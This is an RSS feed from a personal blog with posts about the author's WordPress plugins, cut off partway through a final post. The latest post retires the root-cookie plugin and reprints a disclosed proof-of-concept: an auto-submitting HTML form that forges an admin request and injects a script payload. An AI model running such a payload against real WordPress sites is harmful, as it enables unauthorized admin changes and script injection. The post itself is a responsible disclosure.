<?xml version="1.0" encoding="utf-8"?>
<rss version="2.0"><channel><title>LINICKX.com</title><link>https://www.linickx.com/</link><description></description><lastBuildDate>Sat, 14 Dec 2024 15:59:00 +0000</lastBuildDate><item><title>Goodbye root-cookie</title><link>https://www.linickx.com/goodbye-root-cookie</link><description>&lt;p&gt;&lt;code&gt;TLDR:&lt;/code&gt; 🔥🔥🔥 If you still use root-cookie, please delete it from your WordPress/Website 🔥🔥🔥🔥&lt;/p&gt;
&lt;p&gt;Today I have requested that the Plugins team over at WordPress.org org delete &lt;a href="https://wordpress.org/plugins/root-cookie"&gt;my root-cookie plugin&lt;/a&gt;. I started it back in &lt;a href="https://www.linickx.com/root-cookie-for-wp26"&gt;2008 for WP 2.6&lt;/a&gt;, probably before if you dig into the SVN history, back when things were very different.&lt;/p&gt;
&lt;p&gt;Back in the early days of WordPress, it was a &lt;em&gt;"sub directory"&lt;/em&gt;, i.e. you setup your site with a home page, and then WordPress (blog) was a below that. The problem root-cookie was designed to solve, is that there was no way of accessing the WordPress authentication cookie outside the WordPress folder, so if you wanted to something as simple as change a banner, or theme based on being logged in, you could't. root-cookie was very simple, it hooked into WordPress's authentication functions and stripped the folder out of the cookie, and assigned it to the "root" of the domain, then from your custom code you could read it and do &lt;em&gt;whatever&lt;/em&gt;.&lt;/p&gt;
&lt;p&gt;I really, &lt;em&gt;really&lt;/em&gt; cannot remember what the admin page did or looked like, there's probably some screenshots around here but apparently it contains a Cross Site Request Forgery (CSRF) vulnerability, the steps (&lt;em&gt;apparently, I've not tested&lt;/em&gt;) to reproduce are:&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Make a logged in admin click a link with the following HTML (replace the domain)&lt;/strong&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;!DOCTYPE html&amp;gt;
&amp;lt;html&amp;gt;
&amp;lt;body onload=&amp;quot;document.forms[0].submit()&amp;quot;&amp;gt;
&amp;lt;form action=&amp;quot;http://{domain}/wp-admin/options-general.php?page=root-cookie&amp;quot; method=&amp;quot;POST&amp;quot;&amp;gt;
&amp;lt;input type=&amp;quot;hidden&amp;quot; name=&amp;quot;rootcookie_submit_hidden&amp;quot; value='Y' /&amp;gt;
&amp;lt;input type=&amp;quot;hidden&amp;quot; name=&amp;quot;rootcookie_subdomain_manual&amp;quot; value='&amp;amp;&amp;quot;&amp;gt;&amp;lt;script&amp;gt;alert(1)&amp;lt;/script&amp;gt;' /&amp;gt;
&amp;lt;/form&amp;gt;
&amp;lt;/body&amp;gt;
&amp;lt;/html&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;REF: https://patchstack.com/&lt;/p&gt;
&lt;p&gt;👉🏻 Given that I have not maintained this plugin for &lt;strong&gt;over 13 years&lt;/strong&gt;, I do &lt;em&gt;NOT&lt;/em&gt; intend to publish an update and have requested the plugin be deleted.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;From: Nick&lt;br /&gt;
To: plugins wordpress.org&lt;br /&gt;
Date: 14 Dec 2024, 15:47&lt;br /&gt;
Subject:  Please Delete "root-cookie"&lt;br /&gt;
Body:&lt;/p&gt;
&lt;p&gt;Hello,
Please delete https://wordpress.org/plugins/root-cookie/&lt;/p&gt;
&lt;p&gt;The plugin has not been maintained in 13years, apparently recently it was discovered to contain a CSRF vulnerability, I do not intend to fix it therefore it would be safer for the community if the plugin is removed from wordpress.org.&lt;/p&gt;
&lt;p&gt;Stats show only 11 downloads per week, I don't suppose the plugin is needed anymore, the first version was released in 2008 for WP2.6, I expect a lot has changed since then :)&lt;/p&gt;
&lt;p&gt;Many Thanks in advance for your support.&lt;br /&gt;
Kind Regards,&lt;br /&gt;
Nick &lt;br /&gt;
&lt;/p&gt;
&lt;/blockquote&gt;</description><dc:creator xmlns:dc="http://purl.org/dc/elements/1.1/">Nick Bettison</dc:creator><pubDate>Sat, 14 Dec 2024 15:59:00 +0000</pubDate><guid isPermaLink="false">tag:www.linickx.com,2024-12-14:goodbye-root-cookie</guid><category>WordPress</category><category>plugin</category><category>root-cookie</category><category>Vulnerability</category></item><item><title>root-cookie 1.6, two years in the making?</title><link>https://www.linickx.com/root-cookie-1-6-two-years-in-the-making</link><description>&lt;p&gt;&lt;a href="https://www.linickx.com/files/2011/12/screenshot-1.png"&gt;&lt;img alt="" src="https://www.linickx.com/files/2011/12/screenshot-1-150x150.png" title="Root Cookie Admin Screen Shot" /&gt;&lt;/a&gt;No
taking two years to release an update is not good, but in my defence
root-cookie is so simple that there are very few issues and complaints
;)&lt;/p&gt;
&lt;p&gt;Actually a two year wait isn't strictly true, those watching &lt;a href="https://www.linickx.com/tag/root-cookie"&gt;the dev
log&lt;/a&gt; would have seen I've pushed
the odd update here and there.&lt;/p&gt;
&lt;p&gt;So what prompts this release, well I've noticed that in WP3.3 that the
cookie functions have changed, so to ensure future compatibility (&lt;em&gt;and
minimal issues for me&lt;/em&gt;) I have updated this plugin to be aligned to the
core source.&lt;/p&gt;
&lt;p&gt;The usual blurb...&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Download:
    &lt;a href="http://wordpress.org/extend/plugins/root-cookie/download/"&gt;http://wordpress.org/extend/plugins/root-cookie/download/&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Support:
    &lt;a href="https://wordpress.org/tags/root-cookie?forum_id=10#postform"&gt;https://wordpress.org/tags/root-cookie?forum_id=10#postform&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Bugs:
    &lt;a href="http://plugins.trac.wordpress.org/newticket?component=root-cookie&amp;amp;owner=linickx"&gt;http://plugins.trac.wordpress.org/newticket?component=root-cookie&amp;amp;owner=linickx&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;ChangeLog&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Contextual Help&lt;/li&gt;
&lt;li&gt;Bug fix "undefined method WP_Error::get_items"&lt;/li&gt;
&lt;li&gt;Logout Enhancement&lt;/li&gt;
&lt;li&gt;WP 3.3 Compatability&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.linickx.com"&gt;Donation Link&lt;/a&gt; (&lt;em&gt;it's good for your karma&lt;/em&gt;)&lt;/li&gt;
&lt;/ul&gt;</description><dc:creator xmlns:dc="http://purl.org/dc/elements/1.1/">nick</dc:creator><pubDate>Thu, 22 Dec 2011 22:02:00 +0000</pubDate><guid isPermaLink="false">tag:www.linickx.com,2011-12-22:root-cookie-1-6-two-years-in-the-making</guid><category>PHP</category><category>plugin</category><category>root-cookie</category><category>WordPress</category></item><item><title>phpbb_recent_topics version 0.6</title><link>https://www.linickx.com/phpbb_recent_topics-version-0-6</link><description>&lt;p&gt;&lt;strong&gt;UPDATE&lt;/strong&gt;: This Plugin has been updated, the below links to the new
file, but please &lt;a href="https://www.linickx.com/3311/phpbb_recent_topics-version-0-7"&gt;comment on the new
post&lt;/a&gt;,
&lt;em&gt;thanks&lt;/em&gt;.&lt;/p&gt;
&lt;div style="float: right"&gt;

  -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
  [caption id="attachment\_1935" align="aligncenter" width="150" caption="Screenshot phpbb\_recent\_topics admin page"][![Screenshot phpbb\_recent\_topics admin page](https://www.linickx.com/files/2009/08/phpbb_recent_topix_v05x-150x150.png "Screenshot phpbb_recent_topics admin page")](https://www.linickx.com/files/2009/08/phpbb_recent_topix_v05x.png)[/caption]
  Admin GUI
  -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

&lt;/div&gt;

&lt;p&gt;It's that time again, enough things have happened in &lt;a href="http://wordpress.org/tags/phpbb-recent-topics"&gt;the support
forum&lt;/a&gt; to warrant another
version.&lt;/p&gt;
&lt;p&gt;phpbb_recent_topics 0.6 owes a debt of gratitude to
&lt;a href="http://wordpress.org/support/profile/5927575"&gt;number3nl&lt;/a&gt; he has worked
very hard to push in two main new features and his work was so good it
only needed a couple of minor tweaks from myself.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;New Features!&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;The loooong awaited &lt;strong&gt;&lt;em&gt;phpBB recent post&lt;/em&gt;&lt;/strong&gt;s feature has been
    enabled, simply tick the box that says "Sort results by post date"
    and you're away!&lt;/li&gt;
&lt;li&gt;Tooltips are here! Yup if you're into that kind of thing enabling
    tool tips will show a snippet of the post content to your visitors
    prior to them clicking on any links.&lt;/li&gt;
&lt;li&gt;Admin UI Error Messages are here; the GUI will now inform you if
    you're connected to phpBB.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;Bug Fixes.&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;The variables in display.php now match those of admin-display.php;
    hopefully this will make community contribution simpler.&lt;/li&gt;
&lt;li&gt;Uninstall.php has been added so removal of the plugin is more
    comprehensive.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;A note to upgrader's.&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;If you're using secure database connectivity you'll need to GRANT
    access to the posts table....&lt;br /&gt;
&lt;code&gt;GRANT SELECT ON phpbb_database.phpbb_posts TO wp_user@localhost;&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;&lt;a href="http://wordpress.org/extend/plugins/phpbb-recent-topics/"&gt;Download phpBB_Recent_Topics_0.6 from
wordpress.org&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;The usual stuff now follows....&lt;/p&gt;
&lt;hr /&gt;
&lt;p&gt;&lt;strong&gt;The Installation&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;u&gt;Before starting&lt;/u&gt; you need to get your database configuration
sorted. So, are you going to connect to the PHPBB Database securely or
Insecurely?&lt;/p&gt;
&lt;p&gt;To connect Securely you need to GRANT access TO WordPress FROM phpbb.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;How to GRANT wordpress read only access to phpBB ?&lt;/strong&gt;&lt;br /&gt;
If you don't know it already you need to find your wordpress mysql user
id, it'll be in wp-config.php&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;define('DB_USER', 'wp_user');     // Your MySQL username
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;and you should have already found your phpbb database &amp;amp; table for the
above.&lt;br /&gt;
You need to type the following syntax into your mysql database&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;GRANT SELECT ON phpbb_database.phpbb_topics TO wp_user@localhost;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;strong&gt;AND&lt;/strong&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;GRANT SELECT ON phpbb_database.phpbb_forums TO wp_user@localhost;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;strong&gt;AND&lt;/strong&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;GRANT SELECT ON phpbb_database.phpbb_posts TO wp_user@localhost;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;this can be achieved by logging into
&lt;a href="http://www.phpmyadmin.net"&gt;phpmyadmin&lt;/a&gt; as your phpbb user, selecting
SQL and pasting the correct GRANT into the text box.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;WordPress Installation&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Unzip phpbb_recent_topics.tgz in your `/wp-content/plugins/`
    directory. (&lt;em&gt;You'll have a new directory, with this plugin in
    /wp-content/plugins/phpbb_recent_topics&lt;/em&gt;)&lt;/li&gt;
&lt;li&gt;Activate the plugin through the 'Plugins' menu in WordPress&lt;/li&gt;
&lt;li&gt;Configure the plugin, you need to tell wordpress about phpbb, this
    is done in the wordpress menu 'Settings' -&amp;gt; 'phpBB Recent Topics'&lt;br /&gt;
    The following Settings are required:
    &lt;/p&gt;&lt;ul&gt;
&lt;li&gt;* The name of your phpBB database (&lt;em&gt;e.g phpbb&lt;/em&gt;)&lt;/li&gt;
&lt;li&gt;* The name of the table where topics are held (&lt;strong&gt;the default
    is&lt;/strong&gt; &lt;strong&gt;phpbb_topics&lt;/strong&gt; )&lt;/li&gt;
&lt;li&gt;* The full url of your forum for links (&lt;em&gt;e.g.
    http://www.mydomain.com/forum&lt;/em&gt;)&lt;/li&gt;
&lt;li&gt;* The number of topics to show. (&lt;em&gt;If left blank you get 5&lt;/em&gt;)&lt;/li&gt;
&lt;li&gt;* The Date Formatting, i.e. "d/M/y - g:i a" similar to the
    WordPress "General Settings"&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;The use of Insecure connectivity is optional - See Below&lt;/li&gt;
&lt;li&gt;Tick the boxes of any Forums you don't want this plugin to show
    posts from&lt;/li&gt;
&lt;li&gt;Hit 'Update Options"&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;To output the list of topics in a page or post...&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;* create a new page/post, type {phpbb_recent_topics} , hit
    'Publish' or 'Create new page'&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;To output the list of topics in your theme sidebar using the
widget...&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;* click "design" in the dashboard&lt;/li&gt;
&lt;li&gt;* click "widgets"&lt;/li&gt;
&lt;li&gt;* next to &lt;strong&gt;phpBB Recent Topics click&lt;/strong&gt; "add"&lt;/li&gt;
&lt;li&gt;* click "save changes"&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;To output the list of topics in your theme sidebar using a template
tag...&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;* edit sidebar.php and inside \&amp;lt;div id="sidebar"&amp;gt; type...&lt;pre&gt;&lt;code&gt;&amp;lt;?php
if (function_exists('phpbb_topics')) {
phpbb_topics();
}
?&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;What is Insecure MySQL Connectivity &amp;amp; How do I use it?&lt;/strong&gt;&lt;br /&gt;
If you need to you can connect in a less secure manner, the connection
details held in your PHPBB config.php can be loaded into WordPress. This
is insecure becuase the phpbb3 credentials are store in clear text, this
is bad cuase if someone somehow comprised WordPress they'd have full
access to PHPBB.&lt;/p&gt;
&lt;p&gt;To use, tick the "Enable Insecure Database Connection" box, and submit,
when the page re-freshes you'll have some more boxes to populate, from
your phpbb config.php fill in&lt;/p&gt;
&lt;p&gt;&lt;code&gt;$dbuser = phpbb MySQL Database UserName $dbpasswd = phpbb MySQL Database Password $dbhost = phpbb MySQL Server&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;Click update, and you should be connected!&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Support&lt;/strong&gt;&lt;br /&gt;
I've always been honest about &lt;u&gt;support, there isn't any&lt;/u&gt;.
Basically I write this for my own needs and then publish it for you to
use for free. You're more than welcome to post comments here and if you
need support the community &lt;a href="http://wordpress.org/tags/phpbb-recent-topics?forum_id=10#postform"&gt;&lt;strong&gt;phpbb-recent-topics
forum&lt;/strong&gt;&lt;/a&gt;
is available, I do read every post there but we all have busy lives and
I make no promises on how quickly I'll reply to you.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Finally Subversion&lt;/strong&gt;&lt;br /&gt;
The source for this plugin is in the wordpress subversion, you can
checkout the trunk directly from
&lt;a href="http://plugins.svn.wordpress.org/phpbb-recent-topics/"&gt;here&lt;/a&gt;, if you
weren't aware wp.org also auto-magically creates a nightly build of any
developments
&lt;a href="http://downloads.wordpress.org/plugin/phpbb-recent-topics.zip"&gt;here&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;I hope you enjoy my plug-in!&lt;/p&gt;</description><dc:creator xmlns:dc="http://purl.org/dc/elements/1.1/">nick</dc:creator><pubDate>Fri, 21 May 2010 14:13:00 +0100</pubDate><guid isPermaLink="false">tag:www.linickx.com,2010-05-21:phpbb_recent_topics-version-0-6</guid><category>PHP</category><category>phpBB</category><category>phpbb_recent_topics</category><category>plugin</category><category>WordPress</category></item><item><title>LINICKX LifeStream V0.2</title><link>https://www.linickx.com/linickx-lifestream-v0-2</link><description>&lt;p&gt;[caption id="attachment_2901" align="alignright" width="150"
caption="Screen-shot of config screen"]&lt;a href="https://www.linickx.com/files/2009/12/v2-screenshot-1-800.png"&gt;&lt;img alt="Screen-shot of config
screen" src="https://www.linickx.com/files/2009/12/v2-screenshot-1-800-150x150.png" title="LINICKX LifeStream Admin Screen-Shot" /&gt;&lt;/a&gt;[/caption]&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;UPDATE&lt;/strong&gt;: This Plugin has been updated, the below links to the new
file, but please &lt;a href="https://www.linickx.com/3422/linickx-lifestream-version-0-3"&gt;comment on the new
post&lt;/a&gt;,
&lt;em&gt;thanks&lt;/em&gt;.&lt;/p&gt;
&lt;p&gt;Version 0.2 is the first feature update to my LINICKX Lifestream
plug-in. This version incorporates all the minor bug fixes from version
0.1 -&amp;gt; 0.1.3 and includes what I call my "Troubleshooting Feature
Pack".&lt;/p&gt;
&lt;p&gt;Version 0.1.x was plagued by a hidden multi-post issue, so not only is
this fixed in V0.2, but I've included the tools used by myself to fix
the issue. If you've been effected by this, use the factory reset option
to clear out the lifestream plug-in, the next time it runs new posts
will be created of all your feeds... so yes you will get double posts...
but that will then be the last time it happens! :)&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Plug-in Features:&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Admin Feature Pack (&lt;em&gt;NEW&lt;/em&gt;)&lt;br /&gt;
    Verbose Cron Mode, now you can see what the plug-in is doing!&lt;br /&gt;
    View the contents of the Lifestream Feed DB&lt;br /&gt;
    View the URLS, Tags &amp;amp; Categories stored in the plugin&lt;br /&gt;
    Factory Reset, remove all the settings without having to
    uninstall -&amp;gt; re-install&lt;/li&gt;
&lt;li&gt;Stream Any Feed.&lt;br /&gt;
    Most internet services like digg, twitter, lastfm and the like
    support RSS feeds of your activity, so you can stream any service
    even if I haven't heard about it yet!&lt;/li&gt;
&lt;li&gt;Posts are created from the feeds/stream.&lt;br /&gt;
    Each Feed item creates a new post, you can tag &amp;amp; categorise your
    posts to give each stream a different look &amp;amp; feel in your WordPress
    templates.&lt;/li&gt;
&lt;li&gt;No dependencies.&lt;br /&gt;
    LINICKX LifeStream uses WordPress functions to do it's work, so yes
    it'll work on PHP4 &amp;amp; PHP5 and you don't need to update simplepie or
    an-other dependancy.&lt;/li&gt;
&lt;li&gt;Flexible updating.&lt;br /&gt;
    By default LINICKX LifeStream should just work, WordPress will
    fetch the feeds every 5 minutes and store them in the WP Database,
    but you can change that. If you want to cron your updates every 1
    minute you can, if you want the DB store in a file not in MySQL
    that's not a problem either.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;Bug Fixes&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Version 0.2 Multi-Post issue -
    &lt;a href="http://wordpress.org/support/topic/330243"&gt;http://wordpress.org/support/topic/330243&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Pushed Version 0.1.3 more bug fixes; 0.1.2 broke auto updates, so
    0.1.3 fixes it again!&lt;br /&gt;
    linickx.com was having execution timeout issues, so theres a patch
    to fix that for other users&lt;br /&gt;
    I've also introduced a config.php so that upgrades do not overwrite
    &lt;code&gt;$WPDIR&lt;/code&gt; set by users.&lt;/li&gt;
&lt;li&gt;Pushed version 0.1.2 to fix error in dashboard reported by
    &lt;a href="http://www.aowao.de/"&gt;Markus&lt;/a&gt; .&lt;/li&gt;
&lt;li&gt;Pushed version 0.1.1 as the directory path changed when
    wordpress.org created their .zip file... all should be working
    again.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Right now on LINICKX.com this plugin is streaming
&lt;a href="https://www.linickx.com/archives/tag/digg"&gt;Digg&lt;/a&gt;, &lt;a href="https://www.linickx.com/archives/tag/google-reader"&gt;Google
Reader&lt;/a&gt; and
&lt;a href="https://www.linickx.com/archives/category/blog/sync/svn/wp"&gt;WordPress
Commits&lt;/a&gt;...
keep an eye for new things streamed such as delicious &amp;amp; last fm :cool:&lt;/p&gt;
&lt;div style="border: 2px dotted #0000FF; padding: 0.5em"&gt;

-   ***[Download LINICKX LifeStream from
    WordPress.org](http://wordpress.org/extend/plugins/linickx-lifestream/)***
-   [Get **Support and Help** on
    WordPress.org](http://wordpress.org/tags/linickx-lifestream?forum_id=10#postform)
-   [Submit **Bugs and Patches** to
    Trac](http://plugins.trac.wordpress.org/newticket?component=linickx-lifestream&amp;owner=linickx)

&lt;/div&gt;

&lt;p&gt;&lt;strong&gt;I'm still looking for help.&lt;/strong&gt;&lt;br /&gt;
If you think you can javascript/ajax the admin interface, or my plug-in
WordPress MU compatible, &lt;a href="https://www.linickx.com/contact"&gt;please let me
know&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Disclaimer&lt;/em&gt;&lt;br /&gt;
Plug-in development is a hobby, I have a full time job that takes
priority. Feel free to leave comments on this post but ask support
questions to the WordPress community. I will update this plugin as and
when I need features to improve linickx.com and will consider any
patches submitted including any good ideas you have.&lt;/p&gt;
&lt;p&gt;If you use this plug-in, &lt;a href="https://www.linickx.com/donate"&gt;&lt;strong&gt;please consider
donating&lt;/strong&gt;&lt;/a&gt; as I give this code away for
free and giving something back is good for your kama :cool:&lt;/p&gt;</description><dc:creator xmlns:dc="http://purl.org/dc/elements/1.1/">nick</dc:creator><pubDate>Thu, 10 Dec 2009 13:15:00 +0000</pubDate><guid isPermaLink="false">tag:www.linickx.com,2009-12-10:linickx-lifestream-v0-2</guid><category>LINICKX-LifeStream</category><category>PHP</category><category>plugin</category><category>WordPress</category></item><item><title>Get ready for LINICKX LifeStream!</title><link>https://www.linickx.com/get-ready-for-linickx-lifestream</link><description>&lt;p&gt;Colleagues have noticed that in my spare time at work I've been "getting
my geek on!" the definition being a vi window of code on one screen and
google open in the other ;)&lt;/p&gt;
&lt;p&gt;Linickx LifeStream will be a new WordPress plugin which allows you to
life stream ANY feed. I've been having issues with FeedWordPress and to
be honest it didn't really do what I wanted; now there are already may
&lt;a href="http://wordpress.org/extend/plugins/tags/lifestream"&gt;wordpress lifestream
plug-ins&lt;/a&gt;, but mine
will be different.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Difference 1&lt;/strong&gt;: The plug-in isn't service dependant... i.e. you don't
stream your twitter account or your LastFM account, you stream the feed.
What this means is that when tomorrows-wizzy-new-service is launched you
don't have to wait for me to update the plug-in. It also means you can
stream odd stuff, such as I'm going to stream my commits to the
WordPress plug-in repo ;)&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Difference 2&lt;/strong&gt;: No Requirements. The requirements for this are the
same as &lt;a href="http://wordpress.org/about/requirements/"&gt;the WordPress
requirements&lt;/a&gt;. What this means
is yes it works on PHP4 and no you don't need a separate installation of
simplepie.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Difference 3&lt;/strong&gt;: No Lifestream Pages, extra databases or tables.
LifeStream feeds get created as "normal" WordPress posts, so if you digg
something a post is created and you can do all the normal things like
tag &amp;amp; categorize the post.&lt;/p&gt;
&lt;p&gt;I'm in the process of finishing the package and installing the plug-in
here on linickx.com but &lt;strong&gt;when it's ready&lt;/strong&gt; you'll be able to...&lt;/p&gt;
&lt;p&gt;&lt;a href="http://wordpress.org/extend/plugins/linickx-lifestream/"&gt;Download LINICKX LifeStream
Here&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;With a little luck I'll be able to remove &lt;a href="https://www.linickx.com/archives/630/delicious-bad-behavior"&gt;this
annoyance&lt;/a&gt;
and directly stream delicious and &lt;a href="https://www.linickx.com/archives/2061/google-reader-lifestream-offline"&gt;get google reader working
again&lt;/a&gt;.&lt;/p&gt;</description><dc:creator xmlns:dc="http://purl.org/dc/elements/1.1/">nick</dc:creator><pubDate>Thu, 05 Nov 2009 13:53:00 +0000</pubDate><guid isPermaLink="false">tag:www.linickx.com,2009-11-05:get-ready-for-linickx-lifestream</guid><category>Blog</category><category>LifeStream</category><category>LINICKX-LifeStream</category><category>PHP</category><category>plugin</category><category>WordPress</category></item><item><title>phpbb_recent_topics_0.5.3</title><link>https://www.linickx.com/phpbb_recent_topics_0-5-3</link><description>&lt;p&gt;&lt;a href="https://www.linickx.com/archives/713/phpbb_recent_topics-version-0-5"&gt;0.5.3&lt;/a&gt;
is a minor update which fixes &lt;a href="http://wordpress.org/support/topic/301880"&gt;this
issue&lt;/a&gt; whereby some users got
this error in their admin screens&lt;/p&gt;
&lt;p&gt;&lt;code&gt;Warning: Invalid argument supplied for foreach() in /public_html/wp-content/plugins/phpbb-recent-topics/display/admin-options.php on line 144&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;If you don't have this issue upgrading is optional, &lt;a href="http://wordpress.org/extend/plugins/phpbb-recent-topics/"&gt;download from the
usual place&lt;/a&gt;!&lt;/p&gt;</description><dc:creator xmlns:dc="http://purl.org/dc/elements/1.1/">nick</dc:creator><pubDate>Fri, 21 Aug 2009 18:32:00 +0100</pubDate><guid isPermaLink="false">tag:www.linickx.com,2009-08-21:phpbb_recent_topics_0-5-3</guid><category>PHP</category><category>phpbb_recent_topics</category><category>plugin</category><category>WordPress</category></item><item><title>Follow plug-in development progress</title><link>https://www.linickx.com/follow-plug-in-development-progress</link><description>&lt;p&gt;The &lt;a href="http://plugins.trac.wordpress.org/"&gt;WordPress plugin trac&lt;/a&gt; is a
really cool resource, one of my favourite features is the commit log.&lt;/p&gt;
&lt;p&gt;Development progress of &lt;a href="http://wordpress.org/extend/plugins/profile/linickx"&gt;linickx
plugins&lt;/a&gt; is always
going to be slow because I have a day job but when I find the time to
develop updates I try to commit them to the community as often as I can
so users can stay in the loop.... The thing is users don't necessarily
know the log is there, so here's a couple of links for you...&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="http://plugins.trac.wordpress.org/log/phpbb-recent-topics/"&gt;PHPBB Recent Topics Commit
    Log&lt;/a&gt;
    (&lt;a href="http://plugins.trac.wordpress.org/log/phpbb-recent-topics?limit=100&amp;amp;mode=stop_on_copy&amp;amp;format=rss"&gt;Feed&lt;/a&gt;)&lt;/li&gt;
&lt;li&gt;&lt;a href="http://plugins.trac.wordpress.org/log/root-cookie/"&gt;Root Cookie Commit
    Log&lt;/a&gt;
    (&lt;a href="http://plugins.trac.wordpress.org/log/root-cookie?limit=100&amp;amp;mode=stop_on_copy&amp;amp;format=rss"&gt;Feed&lt;/a&gt;)&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;If you want test drive my development versions on your blog you can
download them from wordpress.org
&lt;a href="http://wordpress.org/extend/plugins/phpbb-recent-topics/download/"&gt;here&lt;/a&gt;
and &lt;a href="http://wordpress.org/extend/plugins/root-cookie/download/"&gt;here&lt;/a&gt;
respectively, feel free to submit patches to fix bugs or implement
features, I'm always open to suggestions and work is always accredited
appropriately.&lt;/p&gt;</description><dc:creator xmlns:dc="http://purl.org/dc/elements/1.1/">nick</dc:creator><pubDate>Mon, 17 Aug 2009 10:13:00 +0100</pubDate><guid isPermaLink="false">tag:www.linickx.com,2009-08-17:follow-plug-in-development-progress</guid><category>PHP</category><category>phpbb_recent_topics</category><category>plugin</category><category>root-cookie</category><category>WordPress</category></item><item><title>Introducing root cookie 1.5 now with subdomain support!</title><link>https://www.linickx.com/introducing-root-cookie-1-5-now-with-subdomain-support</link><description>&lt;p&gt;&lt;strong&gt;UPDATE&lt;/strong&gt;: This Plugin has been updated, please &lt;a href="https://www.linickx.com/3495/root-cookie-1-6-two-years-in-the-making"&gt;see the new
post&lt;/a&gt;,
comments here are now closed.&lt;/p&gt;
&lt;p&gt;A long time ago
&lt;a href="http://wordpress.org/extend/plugins/profile/sc0ttkclark"&gt;Sc0ttClark&lt;/a&gt;came
to me and suggested that his cookie subdomains plug-in &amp;amp; my cookie path
plug-in should be merged.... well I've finally done it!&lt;/p&gt;
&lt;p&gt;There was a little delay in the release as the initial code only worked
for top level .com, .net &amp;amp; .org style domains but a simple "manual"
option in the admin screen now allows you to set the domain name, so
longer domains like .co.uk can be supported!&lt;/p&gt;
&lt;p&gt;All previous functionality is supported, just by enabling the plug-in
the path is stripped out you only need to go into the admin page if you
want to change the subdomain of the cookie.&lt;/p&gt;
&lt;p&gt;The admin page now has a "&lt;em&gt;News &amp;amp; Tutorials&lt;/em&gt;" feed
(&lt;em&gt;&lt;a href="https://www.linickx.com/archives/tag/root-cookie/feed"&gt;subscribe&lt;/a&gt;&lt;/em&gt;) my
plan is to post articles on how to use root-cookie.&lt;/p&gt;
&lt;p&gt;You can &lt;a href="http://wordpress.org/extend/plugins/root-cookie/download/"&gt;download the plugin from
wordpress.org&lt;/a&gt;,
and there is a &lt;a href="http://wordpress.org/tags/root-cookie?forum_id=10#postform"&gt;discussion forum to get community
support&lt;/a&gt;.&lt;/p&gt;</description><dc:creator xmlns:dc="http://purl.org/dc/elements/1.1/">nick</dc:creator><pubDate>Fri, 14 Aug 2009 09:23:00 +0100</pubDate><guid isPermaLink="false">tag:www.linickx.com,2009-08-14:introducing-root-cookie-1-5-now-with-subdomain-support</guid><category>PHP</category><category>plugin</category><category>root-cookie</category><category>WordPress</category></item><item><title>Twitter Tools is for Twitter Tools</title><link>https://www.linickx.com/twitter-tools-is-for-twitter-tools</link><description>&lt;p&gt;Those with a keen eye may have noticed that my tweets / status updates
